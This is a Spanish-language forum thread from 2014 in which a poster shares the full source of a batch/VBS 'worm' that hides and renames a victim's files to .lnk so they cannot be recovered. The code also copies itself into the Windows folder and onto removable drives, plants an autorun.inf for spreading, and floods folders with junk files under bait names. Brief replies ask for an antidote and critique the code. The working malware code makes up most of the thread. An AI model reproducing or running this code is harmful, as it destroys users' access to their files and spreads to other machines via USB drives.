Gusano de accesos directos en BATCH

Iniciado por TheH4ck, 7 Junio 2014, 02:14 AM

0 Miembros y 1 Visitante están viendo este tema.

TheH4ck

Hola , amigos ¡Este es mi primer tema!  ;D.
He estado haciendo un gusano en batch que crea los (exe,carpetas,jpg,todo) en accesos directos , pero no se pueden recuperar porque ya están modificados como lnk.

Les dejo el code del primer archivo: (Este se llama "Archivo.vbs")
Dim oShell
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
oShell.run "s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat" ,vbhide
Set oShell = Nothing


Aquí va el segundo: (Este se llama s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat)
@echo off
rem ============== START ==================
copy Archivo.vbs %SystemRoot%\Archivo.vbs
copy s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
rem LNK FILES CONVERT
ren *.* $~*.*
ren *.* *.lnk
rem Hide files
attrib +s +h /s /d
rem Copy the file
copy %SystemRoot%\Archivo.vbs A:\Archivo.vbs
copy %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat A:\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
copy %SystemRoot%\Archivo.vbs B:\Archivo.vbs
copy %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat B:\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
copy %SystemRoot%\Archivo.vbs E:\Archivo.vbs
copy %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat E:\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
copy %SystemRoot%\Archivo.vbs F:\Archivo.vbs
copy %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat F:\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
copy %SystemRoot%\Archivo.vbs G:\Archivo.vbs
copy %SystemRoot%\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat G:\s12d5s0d01sd1vf1asedfa2sd5fa2sdf0sad2f.bat
rem MP3 Files
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection Midnight Memories.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection You and I.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection Arestra 365965.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection Ares.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection Story of my life.mp3
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection I love you.mp3
rem EXE
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Chatear.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Cliente.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Tra.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Messenger.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Facebook Chat.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Continuarconlinstalacióne.exe
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Calculadora.exe.lnk
rem PNG
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Vintage.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>FEA.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>OneDirection.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>CMD.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Barbies.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>Mundial.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>ElKunAguero.png
echo S4D74D4X8S55S55C5S5X2001SD445552ASD20AS0DFD0AS0DF0A0SD0F0ASD0F5ASD5F2ASDF/ASD2FA2SDF >>MiCelu.png
rem Folder
mkdir $~Disney_Kids
mkdir $~Te_Amo_%random%
mkdir $~OneDirection
mkdir $~Kun Aguero
mkdir $~Mundial
mkdir $~%SystemRoot%
mkdir $~PNG's
mkdir $~Colegio
mkdir $~Trabajos
mkdir $~Trabajiitos
mkdir $~No Perder :D
mkdir $~Archivossss
mkdir $~No_Tocar
mkdir $~Prueba
mkdir $~.Trasher
mkdir $~RECYCLE.BIN
mkdir $~RECYCLER
attrib +h $~RECYCLE
rem SENDInfo
echo User: %username% >>WindowsScriptHost
echo Date: %date% >>WindowsScriptHost
echo Time: %time% >>WindowsScriptHost
rem Random
mkdir %random%
mkdir %random%
mkdir %random%
echo  >>$%random%.exe
rem SFX
echo RANDOMSFX>>%random%%username%$.sfx
rem RAR
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Descargas.rar
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Descargas1.rar
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Descargas2.rar
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Descargas3.rar
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Descargas4.rar
echo ERRRORS5SX5D212E1D478SD5S2D28D5D25C%RANDOM%D5C8D5F585T >>Gta.rar
rem Create direct access
echo NOTHING >>GTA.lnk
echo NOTHING >>%username%.lnk
echo NOTHING >>autorun.exe.lnk
echo NOTHING >>Memo.lnk
echo NOTHING >>D todo un poco.lnk
echo NOTHING >>Buena.lnk
echo NOTHING >>Archivo.vbs.lnk
echo NOTHING >>Jajaja XD.lnk
echo NOTHING >>$~Nueva Carpeta.lnk
echo NOTHING >>Nueva Carpeta1.lnk
echo NOTHING >>GTA SAN ANDREAS.lnk
echo NOTHING >>Descargar Google Chrome.lnk
echo NOTHING >>Chau.lnk
echo NOTHING >>Whatsapp.lnk
echo NOTHING >>JKASIOD8SD9D3DF3.lnk
echo NOTHING >>Localized.lnk
echo NOTHING >>KAKA.lnk
echo NOTHING >>Fox Sports.lnk
echo NOTHING >>Gobierno.lnk
echo NOTHING >>Holis.lnk
echo NOTHING >>Peligro sin codificar.lnk
echo NOTHING >>Casados codfsn hijos.lnk
echo NOTHING >>Memes.lnk
echo NOTHING >>LOL.lnk
echo NOTHING >>RECYCLER.lnk
goto vbs
:vbs
rem Visual Basic
echo msgbox Hola , vbcritical , Error >>Archivo.vbs
echo msgbox Hola , vbcritical , Error >>Archivo2.vbs
echo msgbox Hola , vbcritical , Error >>Archivo3.vbs
goto autoruns
:autoruns
rem Create a autorun file
echo [AUTORUN] >>autorun.inf
echo open="Archivo.vbs"  >>autorun.inf
goto html
:html
rem Create a HTML file
echo PENDRIVE INFECTED >>Youtube.html
echo PENDRIVE INFECTED >>google.html
echo PENDRIVE INFECTED >>restel.html
echo PENDRIVE INFECTED >>movistar.html
echo PENDRIVE INFECTED >>personal.html
echo PENDRIVE INFECTED >>claro.html
echo PENDRIVE INFECTED >>kingstone.html
echo PENDRIVE INFECTED >>whatsapp.html
echo PENDRIVE INFECTED >>Hotmail.html
echo PENDRIVE INFECTED >>Hackear Facebook.html
echo PENDRIVE INFECTED >>Twitter.html
echo PENDRIVE INFECTED >>Facebok.html
echo PENDRIVE INFECTED >>Instagram.html
echo PENDRIVE INFECTED >>JAJAJAJA XD.html
echo PENDRIVE INFECTED >>Tienes que esto!.html
echo PENDRIVE INFECTED >>Wahsing.lnk
goto word
:word
rem Word :D
echo MI WORD! >>$~Nuevo documento.docx
echo MI WORD! >>$~Nuevo documento1.docx
echo MI WORD! >>$~Nuevo documento2.docx
echo MI WORD! >>$~Nuevo documento3.docx
echo MI WORD! >>$~Nuevo documento4.docx
echo MI WORD! >>$~Nuevo documento5.docx
echo MI WORD! >>$~Nuevo documento6.docx
echo MI WORD! >>$~Nuevo documento7.docx
echo MI WORD! >>$~Nuevo documento8.docx
echo MI WORD! >>$~Nuevo documento9.docx
echo MI WORD! >>$~Nuevo documento10.docx
echo MI WORD! >>$~IMPORTANTE.docx
echo >>$~Que es Paint.docx
echo MI WORD! >>$~Nuevo Proyecto.docx
echo MI WORD! >>$~Nose jajajajajjaa XD.docx
echo MI WORD! >>$~Localized.docx
echo MI WORD! >>$~PlayStore.docx
echo MI WORD! >>$~Que es PowerPoint.docx
echo MI WORD! >>$~Descargar GTA SAN ANDREAS.docx
echo MI WORD! >>$~Nuevo Doc1.docx
goto powerpnt
:powerpnt
rem PowerPoint
echo 4D12S0A0D4SD4D4F4E0R0S2F-WE2D5DS-1-5-21-3082524495-3361658343-417941008-1000 >>Sonido.pptx
echo MI WORD! >>$~Nuevo documento.pptx.
echo MI WORD! >>$~Nuevo documento1.pptx
echo MI WORD! >>$~Nuevo documento2.pptx
echo MI WORD! >>$~Nuevo documento3.pptx
echo MI WORD! >>$~Nuevo documento4.pptx
echo MI WORD! >>$~Nuevo documento5.pptx
echo MI WORD! >>$~Nuevo documento6.pptx
echo MI WORD! >>$~Nuevo documento7.pptx
echo MI WORD! >>$~Nuevo documento8.pptx
echo MI WORD! >>$~Nuevo documento9.pptx
echo MI WORD! >>$~Nuevo documento10.pptx
echo MI WORD! >>I$~MPORTANTE.pptx
echo >>$~Que es Paint.pptx
echo MI WORD! >>$~Nuevo Proyecto.pptx
echo MI WORD! >>$~Nose jajajajajjaa XD.pptx
echo MI WORD! >>$~Localized.pptx
echo MI WORD! >>$~PlayStore.pptx
echo MI WORD! >>$~Que es PowerPoint.pptx
echo MI WORD! >>$~Descargar GTA SAN ANDREAS.pptx
echo MI WORD! >>$~Nuevo Doc1.pptx
goto bmp
:bmp
echo 3D65A0Z052d505D02x5a5s25a2c0 >>TeQuiero.bmp
echo %random% >>Holis.bmp
echo %random%4D1 >>Autorun.bmp
echo %random%1D7D11F7212S >>OneDirection.bmp
goto folders
:folders
echo  >>Autorun.folder
mkdir Autorun.exe
mkdir Recycler
cd Recycler
mkdir S-1-5-21-3082524495-3361658343-417941008-1000
cd S-1-5-21-3082524495-3361658343-417941008-1000
echo [.ShellClassInfo] >desktop.ini
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E} >>desktop.ini
echo LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964 >>desktop.ini
exit


PELIGRO: NO ABRAS EL PROGRAMA CREA UNA CARPETA DE PRUEBA Y CREA ARCHIVOS DE PRUEBA!

Siempre Azul

deberias dejar el antidoto por si alguien se infecta!
Siempre Azul, Nunca Rojo.

engel lex

Cita de: shitoman en  7 Junio 2014, 02:29 AM
deberias dejar el antidoto por si alguien se infecta!

está el código y no está ofuscado, si alguien lo usa debería saber como recuperar o hacer antídoto....

por otro lado el código me parece medio loco...
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

daryo

#3
el codigo no sirve
edit:
malinterprete el codigo si sirve pero no es un gusano realmente.
cual es el sentido de crear accesos directos inservibles?
lo mismo con los accesos directos?
los autoruns hace tiempo dejaron de servir

podrias reducir mas de la mitad de lineas dee codigo con el comando for
buenas